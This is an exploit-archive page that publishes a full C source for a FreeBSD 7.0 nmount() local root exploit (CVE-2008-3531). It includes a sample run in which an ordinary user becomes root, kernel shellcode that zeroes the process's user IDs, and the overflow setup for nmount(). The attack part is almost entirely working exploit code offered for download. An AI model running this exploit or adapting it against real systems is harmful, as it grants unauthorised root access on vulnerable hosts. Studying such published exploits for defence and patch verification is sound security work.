exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

FreeBSD nmount() Local Root Exploit

FreeBSD nmount() Local Root Exploit
Posted Jul 3, 2009
Authored by Patroklos Argyroudis | Site census-labs.com

Local root exploit for FreeBSD nmount(). This affects FreeBSD 7.0-RELEASE and 7.0-STABLE.

tags | exploit, local, root
systems | freebsd
advisories | CVE-2008-3531
SHA-256 | f73657bff4c5f05a9a63c9564bcf7f676f9adf0f6b8a1b9a13e53473275ca23d

FreeBSD nmount() Local Root Exploit

Change Mirror Download
/* 
* cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com
*
* Privilege escalation exploit for the FreeBSD-SA-08:08.nmount
* (CVE-2008-3531) vulnerability:
*
* http://security.freebsd.org/advisories/FreeBSD-SA-08:08.nmount.asc
* http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3531
*
* For a detailed analysis see:
*
* http://census-labs.com/news/2009/07/02/cve-2008-3531-exploit/
*
* Sample run:
*
* [argp@leon ~]$ uname -rsi
* FreeBSD 7.0-RELEASE GENERIC
* [argp@leon ~]$ sysctl vfs.usermount
* vfs.usermount: 1
* [argp@leon ~]$ id
* uid=1001(argp) gid=1001(argp) groups=1001(argp)
* [argp@leon ~]$ gcc -Wall cve-2008-3531.c -o cve-2008-3531
* [argp@leon ~]$ ./cve-2008-3531
* [*] vptr = 0x006e776f
* [*] calling nmount()
* nmount: Unknown error: -1036235776
* [argp@leon ~]$ id
* uid=0(root) gid=0(wheel) egid=1001(argp) groups=1001(argp)
*
* $Id: cve-2008-3531.c,v 846ca34be34a 2009/02/29 11:05:02 argp $
*/

#include <sys/param.h>
#include <sys/mount.h>
#include <sys/uio.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sysexits.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>

#define BUFSIZE 249

#define PAGESIZE 4096
#define ADDR 0x6e7000
#define OFFSET 1903

#define FSNAME "msdosfs"
#define DIRPATH "/tmp/msdosfs"

unsigned char kernelcode[] =
"\x64\xa1\x00\x00\x00\x00" /* movl %fs:0, %eax # get curthread */
"\x8b\x40\x04" /* movl 0x4(%eax), %eax # get proc from curthread */
"\x8b\x40\x30" /* movl 0x30(%eax),%eax # get ucred from proc */
"\x31\xc9" /* xorl %ecx, %ecx # ecx = 0 */
"\x89\x48\x04" /* movl %ecx, 0x4(%eax) # ucred.uid = 0 */
"\x89\x48\x08" /* movl %ecx, 0x8(%eax) # ucred.ruid = 0 */
/* # return to the pre-previous function, i.e. vfs_donmount() */
"\x81\xc4\xe8\x00\x00\x00" /* addl $0xe8, %esp */
"\x5b" /* popl %ebx */
"\x5e" /* popl %esi */
"\x5f" /* popl %edi */
"\x5d" /* popl %ebp */
"\xc3"; /* ret */

int
main()
{
void *vptr;
struct iovec iov[6];

vptr = mmap((void *)ADDR, PAGESIZE, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);

if(vptr == MAP_FAILED)
{
perror("mmap");
exit(EXIT_FAILURE);
}

vptr += OFFSET;
printf("[*] vptr = 0x%.8x\n", (unsigned int)vptr);

memcpy(vptr, kernelcode, (sizeof(kernelcode) - 1));

mkdir(DIRPATH, 0700);

iov[0].iov_base = "fstype";
iov[0].iov_len = strlen(iov[0].iov_base) + 1;

iov[1].iov_base = FSNAME;
iov[1].iov_len = strlen(iov[1].iov_base) + 1;

iov[2].iov_base = "fspath";
iov[2].iov_len = strlen(iov[2].iov_base) + 1;

iov[3].iov_base = DIRPATH;
iov[3].iov_len = strlen(iov[3].iov_base) + 1;

iov[4].iov_base = calloc(BUFSIZE, sizeof(char));

if(iov[4].iov_base == NULL)
{
perror("calloc");
rmdir(DIRPATH);
exit(EXIT_FAILURE);
}

memset(iov[4].iov_base, 0x41, (BUFSIZE - 1));
iov[4].iov_len = BUFSIZE;

iov[5].iov_base = "BBBB";
iov[5].iov_len = strlen(iov[5].iov_base) + 1;

printf("[*] calling nmount()\n");

if(nmount(iov, 6, 0) < 0)
{
perror("nmount");
rmdir(DIRPATH);
exit(EXIT_FAILURE);
}

printf("[*] unmounting and deleting %s\n", DIRPATH);
unmount(DIRPATH, 0);
rmdir(DIRPATH);

return EXIT_SUCCESS;
}

/* EOF */

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close